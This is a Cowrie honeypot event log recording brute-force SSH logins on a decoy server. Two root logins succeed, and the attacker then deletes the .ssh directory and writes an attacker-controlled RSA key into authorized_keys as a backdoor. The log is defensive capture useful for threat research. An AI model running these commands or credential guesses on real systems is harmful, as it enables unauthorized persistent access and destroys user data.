{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36600,"dst_ip":"1.2.3.4","dst_port":22,"session":"edfea274ad91","protocol":"ssh","message":"New connection: 212.227.125.160:36600 (1.2.3.4:22) [session: edfea274ad91]","sensor":"my-vps","timestamp":"2025-08-31T06:11:19.384678Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:11:19.795690Z","src_ip":"212.227.125.160","session":"edfea274ad91"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:11:19.796412Z","src_ip":"212.227.125.160","session":"edfea274ad91"}
{"eventid":"cowrie.login.failed","username":"test4","password":"12345678","message":"login attempt [test4/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T06:11:22.040120Z","src_ip":"212.227.125.160","session":"edfea274ad91"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:11:23.739742Z","src_ip":"212.227.125.160","session":"edfea274ad91"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45562,"dst_ip":"1.2.3.4","dst_port":22,"session":"eee049f72a45","protocol":"ssh","message":"New connection: 212.227.235.229:45562 (1.2.3.4:22) [session: eee049f72a45]","sensor":"my-vps","timestamp":"2025-08-31T06:11:29.023143Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39126,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d7d31d64428","protocol":"ssh","message":"New connection: 212.227.235.229:39126 (1.2.3.4:22) [session: 1d7d31d64428]","sensor":"my-vps","timestamp":"2025-08-31T06:11:35.194199Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:11:35.196466Z","src_ip":"212.227.235.229","session":"1d7d31d64428"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:11:35.483340Z","src_ip":"212.227.235.229","session":"1d7d31d64428"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59174,"dst_ip":"1.2.3.4","dst_port":22,"session":"486161196e0e","protocol":"ssh","message":"New connection: 212.227.235.229:59174 (1.2.3.4:22) [session: 486161196e0e]","sensor":"my-vps","timestamp":"2025-08-31T06:11:35.803357Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:11:35.804239Z","src_ip":"212.227.235.229","session":"486161196e0e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:11:35.900890Z","src_ip":"212.227.235.229","session":"eee049f72a45"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:11:35.902086Z","src_ip":"212.227.235.229","session":"eee049f72a45"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:11:36.074138Z","src_ip":"212.227.235.229","session":"486161196e0e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64010,"dst_ip":"1.2.3.4","dst_port":23,"session":"1ba4f674276b","protocol":"telnet","message":"New connection: 212.227.235.229:64010 (1.2.3.4:23) [session: 1ba4f674276b]","sensor":"my-vps","timestamp":"2025-08-31T06:11:36.627850Z"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"qwe123","message":"login attempt [postgres/qwe123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:11:36.632540Z","src_ip":"212.227.235.229","session":"1d7d31d64428"}
{"eventid":"cowrie.login.success","username":"root","password":"s0p0rt3","message":"login attempt [root/s0p0rt3] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:11:37.195481Z","src_ip":"212.227.235.229","session":"486161196e0e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:11:37.757351Z","src_ip":"212.227.235.229","session":"486161196e0e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:11:37.758209Z","src_ip":"212.227.235.229","session":"486161196e0e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:11:37.759234Z","src_ip":"212.227.235.229","session":"486161196e0e"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:11:37.922316Z","src_ip":"212.227.235.229","session":"1d7d31d64428"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:11:38.031113Z","src_ip":"212.227.235.229","session":"486161196e0e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:11:38.629669Z","src_ip":"212.227.235.229","session":"486161196e0e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:11:38.630561Z","src_ip":"212.227.235.229","session":"486161196e0e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:11:38.903548Z","src_ip":"212.227.235.229","session":"486161196e0e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:11:38.904485Z","src_ip":"212.227.235.229","session":"486161196e0e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33826,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9e02e594739","protocol":"ssh","message":"New connection: 212.227.235.229:33826 (1.2.3.4:22) [session: d9e02e594739]","sensor":"my-vps","timestamp":"2025-08-31T06:11:39.179562Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:11:39.180449Z","src_ip":"212.227.235.229","session":"d9e02e594739"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:11:39.456158Z","src_ip":"212.227.235.229","session":"d9e02e594739"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"lighthouse","message":"login attempt [lighthouse/lighthouse] failed","sensor":"my-vps","timestamp":"2025-08-31T06:11:40.425316Z","src_ip":"212.227.125.160","session":"39e417569054"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:11:40.602291Z","src_ip":"212.227.235.229","session":"d9e02e594739"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38384,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f01ba2b84f5","protocol":"ssh","message":"New connection: 212.227.235.229:38384 (1.2.3.4:22) [session: 5f01ba2b84f5]","sensor":"my-vps","timestamp":"2025-08-31T06:11:40.954408Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:11:40.955401Z","src_ip":"212.227.235.229","session":"5f01ba2b84f5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:11:41.198961Z","src_ip":"212.227.235.229","session":"5f01ba2b84f5"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:11:41.879637Z","src_ip":"212.227.235.229","session":"d9e02e594739"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33840,"dst_ip":"1.2.3.4","dst_port":22,"session":"602125190dd6","protocol":"ssh","message":"New connection: 212.227.235.229:33840 (1.2.3.4:22) [session: 602125190dd6]","sensor":"my-vps","timestamp":"2025-08-31T06:11:42.147562Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:11:42.148528Z","src_ip":"212.227.235.229","session":"602125190dd6"}
{"eventid":"cowrie.login.success","username":"root","password":"test@1234","message":"login attempt [root/test@1234] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:11:42.216866Z","src_ip":"212.227.235.229","session":"5f01ba2b84f5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:11:42.418779Z","src_ip":"212.227.235.229","session":"602125190dd6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:11:43.116523Z","src_ip":"212.227.235.229","session":"5f01ba2b84f5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:11:43.117183Z","src_ip":"212.227.235.229","session":"5f01ba2b84f5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:11:43.118014Z","src_ip":"212.227.235.229","session":"5f01ba2b84f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48792,"dst_ip":"1.2.3.4","dst_port":22,"session":"75f85fd08d2f","protocol":"ssh","message":"New connection: 212.227.235.229:48792 (1.2.3.4:22) [session: 75f85fd08d2f]","sensor":"my-vps","timestamp":"2025-08-31T06:11:43.120233Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:11:43.121005Z","src_ip":"212.227.235.229","session":"75f85fd08d2f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:11:43.363225Z","src_ip":"212.227.235.229","session":"5f01ba2b84f5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:11:43.402471Z","src_ip":"212.227.235.229","session":"75f85fd08d2f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:11:43.872463Z","src_ip":"212.227.235.229","session":"5f01ba2b84f5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:11:43.873155Z","src_ip":"212.227.235.229","session":"5f01ba2b84f5"}
{"eventid":"cowrie.session.closed","duration":"44.5","message":"Connection lost after 44.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:11:43.913378Z","src_ip":"212.227.125.160","session":"39e417569054"}
